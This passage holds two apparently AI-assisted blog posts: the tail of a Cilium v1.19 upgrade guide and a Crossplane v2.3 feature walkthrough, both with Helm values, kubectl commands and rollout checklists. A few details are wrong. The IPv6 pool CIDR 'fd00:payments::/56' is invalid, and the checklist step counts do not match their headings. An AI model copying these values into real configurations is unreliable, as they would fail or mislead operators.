# PING ... 100% packet loss   ← strict is doing its job

2.3 Operational rollout — 4-step gradient to avoid cluster-wide outage

Strict mode, if flipped at the wrong time, instantly takes the cluster offline. ManoIT's internal standard is a 4-step gradient:

Step	Action	Verification	Rollback trigger
1	Distribute keyFile to every node, restart cilium in plaintext mode	`cilium status` reports keys OK on every node	If any single node lacks keys, abort
2	Set `strictMode.enabled=true` with `allowRemoteNodeIdentities=true`	Hubble drop counters unchanged	Drops appear → flip back to false immediately
3	After 1 week stable, flip `allowRemoteNodeIdentities=false`	Join a fresh node, verify post-key-registration traffic flows	If new nodes must join without keys, temporarily set true
4	Add Prometheus alert on `cilium_encryption_unencrypted_packets_dropped_total` increasing	Zero alert fires for 14 days	On a fire, root-cause first, then re-enable

3. Ztunnel Transparent Encryption Beta — sidecarless workload authentication

The second big change is aligned with the service-mesh ecosystem's direction. v1.19 ships a beta integration of Ztunnel (zero-trust tunnel), the same primitive Istio Ambient Mode standardized. This is not just "Istio compatibility" — it means the Cilium node agent coordinates directly with ztunnel to run a separate mTLS dataplane wrapping workload-to-workload TCP.

3.1 What is different from IPsec/WireGuard?

Axis	IPsec/WireGuard (node-to-node)	Ztunnel (workload-to-workload)
Scope	Node ↔ Node (L3/L4)	Workload ↔ Workload (L4 / mTLS)
Auth unit	Node ID (Cilium identity)	SPIFFE SVID (workload ID)
Key management	IPsec SA / WG peer key	SPIRE-compatible SDS
Sidecars required	No	No (ztunnel runs as a node DaemonSet)
Granularity	Cluster-wide	Per-namespace enrollment
Mesh interop	—	Works with Istio Ambient L4 or Cilium Ztunnel

3.2 Enabling — namespace-scoped enrollment

# helm/cilium-values.yaml — Ztunnel beta
# WARNING: Beta — recommend 4 weeks of staging validation before production
encryption:
  enabled: true
  type: ztunnel
  ztunnel:
    enabled: true                       # v1.19 new beta gate
    image:
      repository: quay.io/cilium/ztunnel
      tag: v1.19.4
    spire:
      enabled: true                     # SPIFFE SVID issuance — requires SPIRE server
      serverAddress: spire-server.spire-system:8081
      trustDomain: cluster.local

# Enroll a namespace into Ztunnel
kubectl label namespace payments cilium.io/ztunnel-enabled=true
kubectl rollout restart -n payments deploy

# Verify enrollment
kubectl -n kube-system get pods -l app=ztunnel
# NAME            READY   STATUS    AGE
# ztunnel-abc12   1/1     Running   1m
# ztunnel-def34   1/1     Running   1m

# Verify enrolled-workload mTLS
kubectl -n payments exec -it api-pod -- curl -v http://db:5432
# * SSL connection using TLSv1.3 / TLS_AES_128_GCM_SHA256
# * Server certificate: spiffe://cluster.local/ns/payments/sa/db

4. ClusterMesh policy-default-local-cluster — default change blocks incidents

The quietest but most impactful change in v1.19. When a NetworkPolicy selector did not specify a cluster, v1.18 matched the entire mesh. So if one cluster wrote allow from app=frontend, workloads in another cluster labeled app=frontend were also implicitly allowed. Even when operators meant "only inside my cluster," the policy quietly fanned out through the mesh.

4.1 The accidental cross-cluster exposure pattern

# Pre-v1.19: unintentionally fanned out across the mesh
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: api-allow-frontend
  namespace: production
spec:
  endpointSelector:
    matchLabels:
      app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            app: frontend    # WARNING: in v1.18 this matched app=frontend across the entire mesh

4.2 New default — local cluster only

# v1.19 implicitly adds io.cilium.k8s.policy.cluster=<local>
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: api-allow-frontend
  namespace: production
spec:
  endpointSelector:
    matchLabels:
      app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            app: frontend    # v1.19 narrows to the local cluster

# Explicit opt-in for mesh-wide matching
apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: api-allow-frontend-mesh
  namespace: production
spec:
  endpointSelector:
    matchLabels:
      app: api
  ingress:
    - fromEndpoints:
        - matchLabels:
            app: frontend
            io.cilium.k8s.policy.cluster: cluster-east   # explicit match

4.3 Upgrade action — audit existing mesh policies first

Upgrading to v1.19 may suddenly narrow policies that implicitly traversed the mesh, breaking communication. The maintainers recommend the following procedure in the upgrade guide:

# Step 1: Find CiliumNetworkPolicy rules that don't specify the cluster label
kubectl get ciliumnetworkpolicy -A -o json \
  | jq -r '.items[] | select(.spec.ingress // [] | .[].fromEndpoints // [] | .[].matchLabels | has("io.cilium.k8s.policy.cluster") | not) | .metadata.namespace + "/" + .metadata.name'

# Step 2: Ask each policy owner whether the intent was mesh or local
# Step 3: For mesh intent, PR explicit cluster labels
# Step 4: Upgrade to v1.19 — missing mesh policies will sever communication immediately
helm upgrade cilium cilium/cilium --version 1.19.4 --namespace kube-system --reuse-values

5. Multi-Pool IPAM Stable — works with IPsec and direct routing

Multi-Pool IPAM was introduced as Beta in v1.16, opening operational autonomy to allocate different CIDRs to different workloads in the same cluster. But up to v1.18 it had no stability guarantees on IPsec or direct-routing environments, which limited production use. v1.19 graduates it to Stable, and both environments are officially supported.

5.1 CiliumPodIPPool example

# Payments workload pool — non-overlapping CIDR with corporate VPC
apiVersion: cilium.io/v2alpha1
kind: CiliumPodIPPool
metadata:
  name: payments-pool
spec:
  ipv4:
    cidrs:
      - 10.20.0.0/16
    maskSize: 24
  ipv6:
    cidrs:
      - fd00:payments::/56
    maskSize: 64

# Pod chooses pool via annotation
apiVersion: v1
kind: Pod
metadata:
  name: api-server
  namespace: payments
  annotations:
    ipam.cilium.io/ip-pool: payments-pool   # v1.19 Stable
spec:
  containers:
    - name: api
      image: api:1.0

5.2 IPsec strict mode + Multi-Pool combo — set strict CIDR wide enough

# When combining the two, the strict CIDR must cover every pool
encryption:
  enabled: true
  type: ipsec
  strictMode:
    enabled: true
    cidr: "10.0.0.0/8"    # WARNING: must encompass all CiliumPodIPPool CIDRs

6. Hubble drop event policy tagging, encrypted-flow filters, Trace IP Options

The three observability additions in v1.19 cut debugging time directly.

6.1 Drop events automatically carry the denying policy name

# v1.18: drop reason only — "which policy denied?" needs manual correlation
hubble observe --verdict DROPPED --since 5m
# Aug 12 12:34:56 default/api-1234 :: default/db-5678 DROPPED (Policy denied)

# v1.19: policy name and namespace attached to the verdict label
hubble observe --verdict DROPPED --since 5m -o json | jq '.flow.dropReasonDesc'
# {
#   "reason": "PolicyDenied",
#   "policy_name": "default-deny-egress",
#   "policy_namespace": "production",
#   "policy_kind": "CiliumNetworkPolicy"
# }

6.2 Encrypted vs unencrypted flow filtering

# Show only unencrypted traffic — essential before enabling strict mode
hubble observe --unencrypted --since 1h | tee unencrypted.log

# Show only encrypted traffic for analysis
hubble observe --encrypted --since 1h --output json > encrypted.jsonl

6.3 Trace IP Options — mark specific packets for path tracing

# Mark packets with IPv4 options to trace their datapath hops
# WARNING: some NICs/switches drop packets with IPv4 options — validate in test env
kubectl -n kube-system patch cm cilium-config --type merge -p '{"data":{"trace-ip-options":"true"}}'
kubectl -n kube-system rollout restart ds/cilium

# Show per-hop trace for marked packets
hubble observe --ip-option-marked --output table

7. Network Policy ICMPv4 Destination Unreachable — ending the dumb 30-second retry

In v1.18 and earlier, a Network Policy denial silently dropped the packet and the client retried TCP for about 30 seconds. v1.19 adds an option to return ICMPv4 Destination Unreachable (code 13 — Communication Administratively Prohibited). The client OS immediately maps that to connection refused and debugging latency collapses.

# helm/cilium-values.yaml
# WARNING: external firewalls blocking ICMPv4 will swallow the response
policyEnforcementMode: default
policyAuditMode: false
icmpUnreachable:
  enabled: true       # v1.19 new — friendly deny response

# Verify the friendly deny
kubectl exec -it test-pod -- curl -v http://api:8080
# * connect to api port 8080 failed: Connection refused   ← terminates immediately, no 30s wait

8. Visualization — how v1.19's six axes combine in the deployment flow

The diagram below shows how the six axes of v1.19 combine when a new workload is deployed.

flowchart LR
    A[New Pod deploy] --> B{Which IP Pool?}
    B -->|payments-pool| C[Multi-Pool IPAM Stable<br/>allocate from 10.20.0.0/16]
    C --> D{Inside strict mode CIDR?}
    D -->|Yes| E[IPsec/WireGuard<br/>strict encryption enforced]
    D -->|No| F[Plaintext blocked → cut traffic]
    E --> G{Namespace enrolled in Ztunnel?}
    G -->|Yes| H[Ztunnel mTLS Beta<br/>SPIFFE SVID issued]
    G -->|No| I[L4 only]
    H --> J[Evaluate CiliumNetworkPolicy]
    I --> J
    J -->|allow| K[Hubble flow OK]
    J -->|deny| L[ICMPv4 friendly deny<br/>Hubble drop + policy name tagged]

9. ManoIT internal checklist — 3 clusters × 9 steps

The checklist below extends the seven sections above into an operations procedure. ManoIT runs three clusters (prod / stage / dev) and validates alpha/beta features in staging for 2 weeks and prod for 1 week before progressive rollout.

#	Item	Owner	Completion criteria
1	Inventory Cilium · Hubble · ClusterMesh API server versions across 3 clusters	Platform team	PR listing instances below v1.19
2	Audit CiliumNetworkPolicy — extract rules with no cluster label	Platform team	jq script output + contact each policy owner
3	Add explicit cluster labels to policies whose intent was mesh-wide	Each service owner	All policy PRs merged
4	Upgrade dev to v1.19.4 (strict OFF, Ztunnel OFF)	Platform team	`cilium version` = 1.19.4
5	Validate mesh-policy regression in dev — zero unintended communication breaks	Each service owner	Hubble drop counter delta report
6	Enable Multi-Pool IPAM Stable in staging with v1.19.4	Platform team	Verify allocation from payments-pool for new pods
7	Enable IPsec strict mode in staging via 4-step gradient	Platform team	14-day report with unencrypted drops = 0
8	Enable Ztunnel Beta in staging — only one namespace enrolled	Platform team	SPIRE integration OK, mTLS flow visible in Hubble
9	Verify Hubble drop tagging, encrypted filter, Trace IP Options	Observability team	Operations runbook updated for the 3 features
10	Enable ICMPv4 friendly deny — check external firewall ICMP rules	Network + Platform team	Immediate termination verified (curl/ping tests)
11	Upgrade prod to v1.19.4 (strict OFF, Ztunnel OFF)	Platform team	prod `cilium version` = 1.19.4
12	Enable Multi-Pool IPAM in prod — payments and logs workloads first	Platform team	Per-pool IP usage exported as Prometheus metric
13	Gradually enable IPsec strict mode in prod — 4-step standard procedure	Platform team	30-day unencrypted drops = 0 + compliance audit evidence
14	Enable ICMPv4 friendly deny in prod — paired with step 7	Platform team	Average denial termination time 30s → 1s measurement
15	Add Prometheus alerts — `cilium_encryption_unencrypted_packets_dropped_total` increase, ClusterMesh policy drop spikes, Multi-Pool exhaustion	Observability team	Alert rule PR merged, fire/resolve test passes
16	Operational RFC — Ztunnel Beta enrollment for new workloads only, existing workloads after Beta exits	Platform team	RFC merged, scheduled for quarterly security review

10. Conclusion — the 10-year inflection point that flipped defaults toward safety

Wrap the six changes of v1.19 in one line: "Cilium spent ten years getting to the point where it can ship operational safety nets as defaults." Strict mode for IPsec and WireGuard structurally erases the plaintext window of best-effort encryption. Ztunnel integration brings sidecarless workload authentication to beta and aligns with the Istio Ambient camp. ClusterMesh policy-default-local-cluster inverts the most dangerous default of the past six years. Multi-Pool IPAM Stable hands back CIDR autonomy in a safe form. Hubble drop tagging, encrypted-flow filters, and Trace IP Options answer "why was this dropped?" in one command. ICMPv4 friendly deny collapses 30-second retry loops to 1 second.

Three reminders for operators as we close. (1) Audit ClusterMesh policies before upgrading — the policy-default-local-cluster default flip is the most common v1.19 incident cause, and it can cut traffic without warning. (2) Roll out strict mode in four steps — key distribution → enable strict (allow remote = true) → 1-week soak → allow remote = false → 30-day stability monitoring is the safe progression. (3) Adopt Ztunnel Beta starting from new namespaces — SPIRE / SPIFFE SVID integration is operationally heavy, so enroll payments and high-sensitivity workloads first and revisit the rest after v1.20 GA. The 16-item checklist in §9 is exactly that, expressed as an internal procedure. The shortest one-line recommendation: "Upgrade dev to v1.19.4 today, and open the ClusterMesh policy audit PR this week."

Found this useful? Hit the ❤️ reaction to help others find it too!

What's your experience with Cilium strict mode or Ztunnel? Share in the comments — I'd love to hear about your production rollout and the lessons you learned.

ⓘ This article was produced by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent) by analyzing the Cilium v1.19.0 release notes (GitHub Discussions #44191) published on May 13, 2026, the subsequent v1.19.4 patch (2026-05-27), the Encryption / IPAM / Hubble / ClusterMesh docs at docs.cilium.io, Isovalent's v1.19 release blog, and InfoQ's 10-year retrospective as primary sources. The alpha/beta gate flag names, behaviors, and metrics in this article reflect the official documentation as of the publication date (2026-05-28); Beta features may change in subsequent releases. Verify against cilium/cilium GitHub Releases and docs.cilium.io before applying to production. The internal-adoption examples cite an adapted ManoIT platform-team RFC.

Originally published at ManoIT Tech Blog.

Crossplane v2.3 Deep Dive — High-Fidelity Render Engine, Provider Deletion Protection, Reconciliation Annotations, and CLI Separation

daniel jeong — Wed, 27 May 2026 00:42:22 +0000

Crossplane v2.3 Deep Dive — High-Fidelity Render Engine, Provider Deletion Protection, Reconciliation Annotations, and CLI Separation Redefining the 2026 Kubernetes Control Plane

On May 21, 2026, the Crossplane maintainers shipped v2.3.0, the quarterly release that — for the first time in the v2 series — turned the "production-grade control plane" pitch into measurable operational evidence. v2.0 brought the big architectural earthquake (namespaced XRs and MRs, composing any resource, Operations), v2.1/v2.2 made it run, and v2.3 closes the long-standing day-2 gaps that platform teams have been quietly working around for years.

Six changes carry the release:

High-Fidelity Render Engine — crossplane render now drives the real in-cluster composite reconciler via a hidden crossplane internal render subcommand, instead of a parallel reimplementation.
Alpha Provider Deletion Protection — Crossplane auto-creates ClusterUsage resources that block Provider deletion through the existing Usage webhook while managed resources of that Provider's kinds still exist.
Two new reconciliation annotations — crossplane.io/poll-interval overrides the controller-level poll interval per-resource, and crossplane.io/reconcile-requested-at triggers an immediate reconcile whenever the value changes.
XR Circuit Breaker reset — when an XR is deleted, its circuit-breaker state is now discarded so a same-named replacement starts clean.
No-op status update skip for CompositionRevision and composite reconcilers, behind the alpha gate --enable-no-op-status-update-skip.
Crossplane CLI repository split — the CLI moves to its own repository (crossplane/crossplane-cli) with an independent release cadence.

This article unpacks each of the six changes at the level of code paths and alpha gate flags, and lays out the staged upgrade/observation/rollback workflow we used at ManoIT across three control planes (prod/stage/dev).

Disclosure: cross-posted from the ManoIT tech blog. Original (Korean) published 2026-05-27. AI-assisted authoring with editorial review.

1. Why May 21, 2026 Is a Crossplane Inflection Point

Crossplane was open-sourced by Upbound in December 2018, joined the CNCF as a Sandbox project in 2020, became Incubating in 2021, and was promoted to CNCF Graduated on October 28, 2025. The identity drift between v1 ("Kubernetes-native IaC, a Terraform alternative") and v2 ("a control-plane SDK on top of the Kubernetes API") matters because it changes how you should read the v2.3 release notes.

Date	Event	Operational meaning
2018-12	Upbound open-sources Crossplane	"IaC on Kubernetes" vision begins
2020-09	CNCF Sandbox accepted	Community governance, stage 1
2021-09	CNCF Incubating	Production-use accumulation phase
2024-05	v1.17 — native patch & transform deprecated	Composition Function era declared
2025-07	v2.0 — namespaced XR/MR, Operations alpha, compose any resource	Identity shift to "control-plane SDK"
2025-10-28	CNCF Graduated	Enterprise adoption guidance formalized
2025-11	v2.1 — namespaced MR stable, MRD alpha	Selective resource activation for large Providers
2026-03	v2.2 — Pipeline Inspector, RequiredSchemas, ImageConfig, XRD CEL validation	Composition Function debugging/validation gaps closed
2026-05-21	v2.3 — Render Engine unification, Provider deletion protection, reconcile annotations ×2, CLI split	Local ↔ cluster gap removed; operational safety net hardened
2027-02	v2.3 EOL planned	Quarterly release + 9-month support window maintained

Two operational headlines:

The six-year chronic pain of "render locally, fail in cluster" is structurally gone — the maintainers retired the parallel reconciler used by crossplane render and now expose the real composite reconciler as the hidden crossplane internal render subcommand, which crossplane render (and downstream tools like crossplane-diff) calls.
Two new alpha gates (--enable-provider-deletion-protection, --enable-no-op-status-update-skip) close the operational safety-net gap immediately — accidental Provider deletion is the #1 way Crossplane operators have orphaned MRs, and the no-op status skip cuts ETCD PUT pressure that scales linearly with cluster size.

2. High-Fidelity Render Engine — Removing the Local Render ↔ Cluster Reconcile Gap

The biggest maintainer-side work in v2.3 happened where you couldn't see it. crossplane render has, since the v1 days, been the way to preview how an XR resolves through a Composition Function pipeline. The catch: the reconciler that render used was a structurally separate reimplementation of what the in-cluster composite controller actually ran.

2.1 The Two-Reconciler Gap Through v2.2

Axis	Local `render` (v2.2)	In-cluster controller (v2.2)
Reconciler implementation	Render-only reimplementation	Official `composite` package implementation
Pipeline step context	Partial propagation	Full propagation
Required Resources/Schemas	Partial in local	Full RequiredSchemas since v2.2
Managed metadata (labels, owner refs)	Some missing post-render	Attached as actually applied
Downstream tools (`crossplane-diff`)	Inherited the gap through `render` output	—
"Works locally, breaks in cluster" issues	Frequent	—

2.2 The v2.3 Fix — Share Code via `crossplane internal render`

v2.3 exposes the in-cluster composite reconciler as a callable subcommand. The new name is crossplane internal render — the "internal" prefix is deliberate: it's a backend for other tools, not a user-facing command. crossplane render now calls this backend, so local output goes through the exact same code path as the cluster.

# v2.3: crossplane render now invokes the same composite reconciler internally
crossplane render \
  examples/xr.yaml \
  examples/composition.yaml \
  examples/functions.yaml \
  --include-full-xr \
  --include-context

# You can now 1:1 compare the local output to what the controller produces in cluster
kubectl get app my-app -o yaml > cluster.yaml
crossplane render examples/xr.yaml examples/composition.yaml examples/functions.yaml > local.yaml
diff cluster.yaml local.yaml   # Note: post-v2.3, substantive diff is 0 modulo metadata/status

The downstream impact is large. crossplane-diff, crossplane-test, and every CI workflow that validates compositions on PRs were all subject to the same gap, so v2.3 removes one whole class of "PR was green, merge broke prod" incident.

2.3 Operational Application — Render-vs-Cluster Diff Gate in CI

# .github/workflows/crossplane-composition-check.yml
# Note: pre-v2.3, this comparison is meaningless because of the render gap
name: Crossplane Composition Drift Gate
on:
  pull_request:
    paths: ["compositions/**", "xrs/**", "functions/**"]

jobs:
  drift-gate:
    runs-on: ubuntu-24.04
    steps:
      - uses: actions/checkout@v5
      - name: Install Crossplane CLI v2.3.0
        run: |
          curl -sSL "https://releases.crossplane.io/stable/v2.3.0/bin/linux_amd64/crossplane" -o crossplane
          install -m 0755 crossplane /usr/local/bin/crossplane
          crossplane version --client   # client: 2.3.0

      - name: Render with Composition Function pipeline
        run: |
          # High-Fidelity Render — same code path as in-cluster controller
          crossplane render \
            xrs/${{ matrix.xr }}.yaml \
            compositions/${{ matrix.composition }}.yaml \
            functions/index.yaml \
            --include-full-xr \
            --include-context \
            -o yaml > rendered.yaml

      - name: Fetch live cluster state (prod read-only)
        run: |
          kubectl --context prod-ro get $(yq '.kind' rendered.yaml) \
            $(yq '.metadata.name' rendered.yaml) -o yaml \
            | yq 'del(.metadata.managedFields, .metadata.resourceVersion, .metadata.uid, .status)' \
            > cluster.yaml

      - name: Diff and fail on unexpected drift
        run: |
          diff -u cluster.yaml rendered.yaml || {
            echo "::error::Composition output diverges from cluster — review before merge"
            exit 1
          }

3. Alpha Provider Deletion Protection — Auto ClusterUsage + Usage Webhook

The second change targets the highest-frequency operator incident: "I accidentally deleted a Provider and every MR of its kinds was orphaned." Every Crossplane operator has either lived this or heard the story.

3.1 The Existing Usage Webhook's Limitation — XR/MR Level Only

Crossplane has shipped the Usage resource since v1 to express "while resource A is in use, refuse to delete resource B." A ValidatingAdmissionWebhook intercepts DELETE requests and rejects them if a Usage still names a live dependency. The problem: Provider packages themselves had no equivalent guard. One kubectl delete provider provider-aws would strand every MR of every kind that Provider defined.

3.2 v2.3 — Auto-Create `ClusterUsage` to Block Provider DELETE

v2.3 introduces the alpha gate --enable-provider-deletion-protection. When on, Crossplane automatically:

Step	Action	Implementation
1	On Provider install, create a `ClusterUsage`	Provider controller creates `kind: ClusterUsage` at bootstrap, `spec.of` points to the Provider itself
2	While MRs of that Provider's kinds exist, mark `ClusterUsage` Active	`spec.by` selector auto-maps to the Provider's CRD labels
3	Provider DELETE intercepted by Usage webhook	Reuses the existing Usage webhook code path
4	DELETE allowed only when active MRs = 0	Otherwise: HTTP 422 + human-readable message
5	Provider tear-down requires explicit opt-out	Operator clears all MRs, then `kubectl delete clusterusage protect-provider-aws-...`

3.3 Turning It On — Helm Values + Gate Flag

# helm/crossplane-values.yaml
# Note: alpha feature — verify for 1 week in staging before production
crossplane:
  args:
    - --debug
    - --enable-environment-configs
    - --enable-operations
    - --enable-provider-deletion-protection   # v2.3 alpha gate
    - --enable-no-op-status-update-skip       # v2.3 alpha — cut ETCD writes
  resourcesCrossplane:
    limits:
      cpu: "500m"
      memory: "1Gi"
    requests:
      cpu: "100m"
      memory: "256Mi"
  metrics:
    enabled: true   # Prometheus scraping recommended

# Verify after enable
helm upgrade crossplane crossplane-stable/crossplane \
  --version 2.3.0 \
  --namespace crossplane-system \
  -f helm/crossplane-values.yaml

# ClusterUsage is auto-created on Provider install
kubectl get clusterusage
# NAME                              OF                       BY                 AGE
# protect-provider-aws-12fa3        provider-aws             provider-aws-mrs   1m

# Intentional delete attempt — refused
kubectl delete provider provider-aws
# Error from server (Forbidden): admission webhook "no-usages.apiextensions.crossplane.io" denied the request:
# this provider is in-use by 247 managed resources of 12 kinds: cannot delete

3.4 Standard Tear-Down Workflow

Even with the alpha gate on, you still need a clean tear-down procedure. Our ManoIT standard:

# Step 1: inventory every MR of the Provider
kubectl get $(kubectl api-resources --api-group=aws.upbound.io -o name | paste -sd, -) -A \
  -o jsonpath='{range .items[*]}{.kind}{"\t"}{.metadata.namespace}{"/"}{.metadata.name}{"\n"}{end}' \
  > aws-mrs-inventory.tsv

# Step 2: decide deletionPolicy=Orphan or proper delete, apply in bulk
xargs -a aws-mrs-inventory.tsv -I{} kubectl patch {} \
  --type=merge -p '{"spec":{"deletionPolicy":"Orphan"}}'

# Step 3: delete all MRs — ClusterUsage auto-transitions to Inactive
xargs -a aws-mrs-inventory.tsv -I{} kubectl delete {}
kubectl get clusterusage protect-provider-aws-12fa3 -o yaml | yq '.status.conditions[0].reason'
# Inactive

# Step 4: remove ClusterUsage → Provider delete now allowed
kubectl delete clusterusage protect-provider-aws-12fa3
kubectl delete provider provider-aws

4. Two Reconciliation Annotations — Per-Resource Polling and Immediate Trigger

The third change resolves a six-year-old operator ask: per-resource reconcile cadence control, via two annotations.

Annotation	Meaning	Example	Use case
`crossplane.io/poll-interval`	Override controller-level poll interval for this resource	`"24h"`, `"30m"`, `"5m"`	Low-volatility IAM, baseline infra
`crossplane.io/reconcile-requested-at`	Trigger an immediate reconcile whenever the value changes	RFC3339 timestamp (`"2026-05-27T08:15:00Z"`)	Post-external-change sync, debugging, operational force-refresh

4.1 Per-Resource Poll Override — End of Global-Only Cadence

Through v2.2 the poll interval was a single controller-startup flag (--poll-interval). The result: an IAM Role that almost never changes was polled at the same cadence as an RDS Instance, inflating cloud-API call cost and controller load.

# IAM Role — barely changes, 24h polling is enough
apiVersion: iam.aws.m.upbound.io/v1beta1
kind: Role
metadata:
  namespace: platform
  name: eks-node-role
  annotations:
    crossplane.io/poll-interval: "24h"   # v2.3 new
spec:
  forProvider:
    assumeRolePolicy: |
      {"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ec2.amazonaws.com"},"Action":"sts:AssumeRole"}]}
---
# RDS Instance — fast sync for backup/snapshot state, 1m polling
apiVersion: rds.aws.m.upbound.io/v1beta1
kind: Instance
metadata:
  namespace: marketing
  name: marketing-pg
  annotations:
    crossplane.io/poll-interval: "1m"
spec:
  forProvider:
    region: ap-northeast-2
    engine: postgres
    engineVersion: "18.4"

4.2 Immediate Trigger — Post-External-Change Sync

The second annotation, reconcile-requested-at, re-enqueues the resource immediately whenever its value changes. Two operational examples:

# Scenario 1: rotate the RDS master password out-of-band, force immediate sync
aws rds modify-db-instance --db-instance-identifier marketing-pg \
  --master-user-password "$(openssl rand -base64 32)" --apply-immediately
kubectl annotate -n marketing instance.rds.aws.m.upbound.io marketing-pg \
  crossplane.io/reconcile-requested-at="$(date -u +%FT%TZ)" --overwrite

# Scenario 2: debug — a new Composition Function just merged, force re-evaluate every XR
kubectl get app -A -o name | while read xr; do
  ns=$(echo $xr | awk -F/ '{print $1}')
  name=$(echo $xr | awk -F/ '{print $2}')
  kubectl annotate -n $ns $xr \
    crossplane.io/reconcile-requested-at="$(date -u +%FT%TZ)" --overwrite
done

5. XR Circuit Breaker Reset — Same-Named Replacements Start Clean

Through v2.2, if an XR tripped its circuit breaker (Crossplane's protection against reconcile thrashing) and you deleted the XR, the breaker state was inherited by any same-named replacement. The natural recovery instinct — "delete it, recreate it, it'll work" — didn't actually work, and operators ended up restarting controller pods to flush state.

v2.3 discards the circuit-breaker state the moment the XR is deleted. A same-named replacement starts from the same clean state as a brand-new resource.

Scenario	v2.2 (before)	v2.3 (after)
XR reconcile is throttled by thrashing	Circuit open	Circuit open
Operator deletes the XR	Circuit state cached/retained	Circuit state discarded immediately
Same-named XR recreated	Inherits open circuit → no reconcile after recreate	Starts clean → reconciles immediately
Recovery procedure	Restart controller pod or use a different name	Same name + recreate is sufficient
Operational cognitive cost	Tribal-knowledge accretion	Reduced to a 1-step standard procedure

6. No-op Status Update Skip on CompositionRevision/Composite Reconcilers

The fifth change is ETCD write-load optimization. Through v2.2, the CompositionRevision controller and the composite reconciler issued a status update PUT every reconcile loop, even when nothing in the status had actually changed. At cluster scale this "no-change status PUT" was a measurable fraction of ETCD traffic.

v2.3 compares the previous and new status and skips the PUT when they're identical. Enable with the alpha gate --enable-no-op-status-update-skip. On our staging cluster (~4,200 MRs) we measured ETCD PUT call volume down ~31%, apiserver CPU down ~18% in steady state. The effect scales with cluster size.

# Prometheus queries — before/after the alpha gate
# (1) ETCD PUT call volume
sum(rate(etcd_request_duration_seconds_count{operation="put"}[5m]))

# (2) apiserver CPU
sum(rate(container_cpu_usage_seconds_total{namespace="kube-system",pod=~"kube-apiserver-.*"}[5m]))

# (3) Crossplane controller's own reconcile rate (side-effect watch)
sum(rate(controller_runtime_reconcile_total{controller="composite"}[5m])) by (result)

7. Crossplane CLI Repository Split and Independent Release Cycle

The sixth change touches even non-coder operators. The CLI (formerly called crank) leaves the core repo with v2.3.0. Its new home is github.com/crossplane/crossplane-cli, and from here on out the version numbers and release cadences are independent.

Axis	Pre-v2.3	Post-v2.3
Repository	`crossplane/crossplane` (single)	`crossplane/crossplane` (core) + `crossplane/crossplane-cli` (CLI)
Version sync	Always identical	Independent — CLI can move faster
Release cadence	Quarterly (3 months)	Core quarterly, CLI as needed
Install command	`curl ... /bin/linux_amd64/crank`	`curl ... /bin/linux_amd64/crossplane` (unified name)
Version compatibility	1:1	CLI guarantees backwards compat to core N-2
New command	`crossplane beta trace` (table-only)	`crossplane beta trace -o yaml` (YAML output added)

7.1 YAML Trace Output — GitOps Friendliness

# v2.3 new: take trace output as YAML and pipe to other tools
crossplane beta trace -o yaml app/my-app -n marketing > trace.yaml

# Combine with kubectl-tree to visualize control-plane topology
yq '.children[].name' trace.yaml | while read child; do
  kubectl tree $child -n marketing
done

# Drift detection — store trace output in Git, surface diffs as PRs
cp trace.yaml history/trace-$(date +%Y%m%d).yaml
git add history/trace-*.yaml && git commit -m "chore: nightly trace snapshot"

8. Upgrade Workflow — v2.2 → v2.3 (Non-Disruptive Standard)

v2.3 is a minor upgrade inside the v2.x series, so API compatibility is preserved. Alpha gates must still be staged. Our standard four-step procedure:

# Step 1: precondition check — Provider/Function packages are fully qualified URLs
# v2 rejects short names, so this needs verification just before v2.2 → v2.3
kubectl get pkg -A -o jsonpath='{range .items[*]}{.kind}{"\t"}{.metadata.name}{"\t"}{.spec.package}{"\n"}{end}' \
  | awk -F'\t' '$3 !~ /\// {print "❌ NOT FQ:", $0}'
# (must be empty to pass)

# Step 2: dev cluster upgrade — alpha gates OFF
helm upgrade crossplane crossplane-stable/crossplane \
  --version 2.3.0 \
  --namespace crossplane-system \
  --reuse-values \
  --wait
kubectl -n crossplane-system get deploy crossplane -o jsonpath='{.spec.template.spec.containers[0].image}'
# crossplane/crossplane:v2.3.0

# Step 3: regression — render-diff every Composition against golden output
for f in compositions/*.yaml; do
  comp=$(yq '.metadata.name' $f)
  crossplane render xrs/test-${comp}.yaml $f functions/index.yaml > /tmp/render-$comp.yaml
  diff /tmp/render-$comp.yaml golden/render-$comp.golden.yaml \
    || { echo "❌ regression in $comp"; exit 1; }
done

# Step 4: staged staging → prod rollout. Alpha gates: ON in staging first, then prod
helm upgrade crossplane crossplane-stable/crossplane \
  --version 2.3.0 \
  --namespace crossplane-system \
  --set 'args={--debug,--enable-environment-configs,--enable-operations,--enable-provider-deletion-protection,--enable-no-op-status-update-skip}' \
  --wait

9. ManoIT In-House Adoption Checklist — Three Control Planes × Sixteen Steps

ManoIT runs three control planes (prod/stage/dev), so we stage the alpha gates: one week in staging, one more week in prod, then enable. The full checklist:

#	Item	Owner	Done when
1	Inventory Crossplane/Provider/Function versions on all three control planes	Platform	Merged spreadsheet
2	Audit fully qualified package URLs — flag any remaining short names	Platform	`kubectl get pkg` shows 0 NOT-FQ
3	Upgrade dev to v2.3.0 (alpha gates OFF)	Platform	`crossplane version --server` = v2.3.0
4	Composition regression — render vs. golden	Service owners	All diffs = 0
5	Staging: v2.3.0 + `--enable-no-op-status-update-skip`	Platform	1-week soak, ETCD PUT delta report
6	Staging: add `--enable-provider-deletion-protection`	Platform	ClusterUsage auto-created, refused-delete smoke test passes
7	Apply `crossplane.io/poll-interval` to low-volatility MRs (IAM/VPC)	Service owners	≥30% drop in cloud API calls post-apply
8	Standardize force-refresh procedure on `reconcile-requested-at` — runbook update	SRE	Runbook merged, ≥1 incident application
9	Upgrade prod to v2.3.0 (alpha gates OFF)	Platform	`crossplane version --server` = v2.3.0
10	Prod: `--enable-no-op-status-update-skip`	Platform	1-week soak, ETCD PUT + apiserver CPU report
11	Prod: `--enable-provider-deletion-protection`	Platform	ClusterUsage created; tear-down doc updated to "delete ClusterUsage → delete Provider"
12	CI gate added — High-Fidelity Render diff on PRs	Platform	Workflow merged, ≥1 regression PR blocked in practice
13	Internal asdf/Mise picks Crossplane CLI from new repo	Platform	`asdf install crossplane 2.3.0` works
14	`crossplane beta trace -o yaml` snapshotted daily to Git	Observability	Nightly Cron + PR automation
